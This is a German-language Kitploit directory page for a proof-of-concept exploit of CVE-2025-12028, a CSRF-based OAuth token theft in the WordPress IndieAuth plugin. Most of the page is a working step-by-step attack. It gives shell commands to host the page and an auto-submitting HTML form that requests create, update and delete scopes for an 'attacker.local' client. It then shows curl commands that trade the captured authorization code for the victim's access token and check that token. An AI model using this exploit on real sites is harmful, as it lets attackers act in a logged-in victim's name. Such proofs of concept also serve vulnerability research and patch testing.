Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-12028 — Proof-of-concept Exploit für CVE-2025-12028, der CSRF-basierten OAuth-Token-Diebstahl im WordPress IndieAuth-Plugin demonstriert und unbefugten API-Zugriff mit gestohlenen Zugangsdaten ermöglicht. | Kitploit
Tools/GitHubGitHub/jfriedli/cve-2025-12028
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsAuthentifizierung
GitHubjfriedli/cve-2025-12028

CVE-2025-12028

Proof-of-concept Exploit für CVE-2025-12028, der CSRF-basierten OAuth-Token-Diebstahl im WordPress IndieAuth-Plugin demonstriert und unbefugten API-Zugriff mit gestohlenen Zugangsdaten ermöglicht.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

1) Starte einen einfachen HTTP-Server, um die Proof-of-Concept-Seite zu hosten

root@kitploit:~
mkdir -p /tmp/attacker && cd /tmp/attacker
php -S 127.0.0.1:8000

2) Erstelle eine Datei /tmp/attacker/poc.html mit folgendem Inhalt

root@kitploit:~
<!doctype html>
<html>
  <body>
    <form id="x" method="post" action="http://localhost/wordpress/wp-login.php?action=indieauth">
      <input name="client_id" value="http://attacker.local/app">
      <input name="redirect_uri" value="http://127.0.0.1:8000/cb">
      <input name="state" value="csrf-12345">
      <input name="response_type" value="code">
      <input name="scope[]" value="create">
      <input name="scope[]" value="update">
      <input name="scope[]" value="delete">
    </form>
    <script>
      document.getElementById('x').submit();
    </script>
  </body>
</html>

3) Löse den PoC in einer eingeloggten Browsersitzung aus

Während du eingeloggt bist in:

root@kitploit:~
http://localhost/wordpress

Öffne:

root@kitploit:~
http://127.0.0.1:8000/poc.html

in derselben Browsersitzung.


4) Beobachte die Autorisierungsweiterleitung

Der Browser wird:

  • POST an den IndieAuth-Endpunkt mit den Cookies des Opfers senden
  • Einen Autorisierungscode erhalten
  • Weiterleiten zu:
root@kitploit:~
http://127.0.0.1:8000/cb?code=...&state=csrf-12345

5) Tausche den Code gegen ein Access-Token aus

root@kitploit:~
curl -sX POST "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -d "grant_type=authorization_code" \
  -d "code=PASTE_CODE_FROM_STEP_4" \
  -d "client_id=http://attacker.local/app" \
  -d "redirect_uri=http://127.0.0.1:8000/cb"

6) Beobachte die Token-Antwort

Die JSON-Antwort wird Felder enthalten wie:

  • access_token
  • scope
  • me
  • (möglicherweise) refresh_token

Dieses Token kann nun verwendet werden, um im Namen des Opfers innerhalb der gewährten Bereiche zu handeln.


7) Überprüfe das Token

root@kitploit:~
TOKEN="PASTE_ACCESS_TOKEN"

curl -s "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -H "Authorization: Bearer $TOKEN"
Tool herunterladen